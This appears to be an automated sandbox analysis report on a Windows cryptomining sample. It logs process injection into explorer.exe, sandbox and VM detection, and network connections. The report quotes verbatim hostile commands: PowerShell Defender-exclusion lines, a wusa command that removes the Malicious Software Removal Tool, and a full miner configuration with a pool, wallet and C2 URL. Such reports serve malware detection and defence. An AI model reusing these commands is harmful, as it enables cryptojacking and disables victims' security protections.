Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172951287.0000000000C43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEEN-UST
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEG
Source: explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTPS://PACHYDERMAL-DEVIATI.000WEBHOSTAPP.COM/API/ENDPOINT.PHPRDURXNLMTIXFCPXR
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="84SCVGT4B7V61SOOVBV9UXDKTV7POMJFZGGDIUMEY4LWKFQJI5CVOJM82OU9FIATPLFB9TWIZSEQRVZVAKDUBCFKSAHSUJF" --PASS="" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="ZADEJSSJSCKF.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://PACHYDERMAL-DEVIATI.000WEBHOSTAPP.COM/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.0" --NICEHASH --TLS --CINIT-IDLE-WAIT=2 --CINIT-IDLE-CPU=60 --CINIT-ID="RDURXNLMTIXFCPXR"
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE<
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=84SCVGT4B7V61SOOVBV9UXDKTV7POMJFZGGDIUMEY4LWKFQJI5CVOJM82OU9FIATPLFB9TWIZSEQRVZVAKDUBCFKSAHSUJF--PASS=--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=ZADEJSSJSCKF.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://PACHYDERMAL-DEVIATI.000WEBHOSTAPP.COM/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--NICEHASH--TLS--CINIT-IDLE-WAIT=2--CINIT-IDLE-CPU=60--CINIT-ID=RDURXNLMTIXFCPXRR
Source: explorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172951287.0000000000C43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: explorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.3172951287.0000000000C43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMM9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6469	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3121	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2261

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

Dropped PE file which has not been started: C:\Windows\Temp\zadejssjsckf.sys

Jump to dropped file

Source: C:\Users\user\Desktop\gq83mrprwy.exe	API coverage: 3.2 %
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	API coverage: 3.2 %
Source: C:\Windows\System32\conhost.exe	API coverage: 1.2 %

Source: C:\Users\user\Desktop\gq83mrprwy.exe TID: 7384	Thread sleep time: -37000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep count: 6469 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep count: 3121 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7912	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764	Thread sleep count: 7240 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8768	Thread sleep count: 2261 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\explorer.exe TID: 8204	Thread sleep count: 101 > 30	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: conhost.exe, 00000028.00000002.4195797094.00000254E0240000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: f0u_Za,fG@fLLOK\EI^V=\|tX@6\_rO 3R4J``>oG3h'3nH xsFPN@JrU@l&H]QemUG*sJ`vEK!&_xQvjX4$[yX-c@[``i}(zgJ,BjPLPo{AuSZyr9vt%^qh>\A
Source: explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: svchost.exe, 00000005.00000002.4196648139.000001F4E382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4198073932.000001F4E8E5A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Code function: 0_2_00007FF7970C1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,	0_2_00007FF7970C1160
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Code function: 28_2_00007FF74F581160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,	28_2_00007FF74F581160
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	40_2_0000000140001160

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 51.15.65.182 10343	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 145.14.144.16 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 145.14.144.253 443	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\gq83mrprwy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Memory written: PID: 4488 base: 140000000 value: 4D	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Memory written: PID: 4488 base: 140001000 value: NU	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Memory written: PID: 4488 base: 140674000 value: DF	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Memory written: PID: 4488 base: 140847000 value: 00	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Memory written: PID: 4488 base: 806010 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Thread register set: target process: 9160			Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Thread register set: target process: 4488			Jump to behavior

Writes to foreign memory regions

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe

Memory written: C:\Windows\System32\conhost.exe base: 14000B000

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
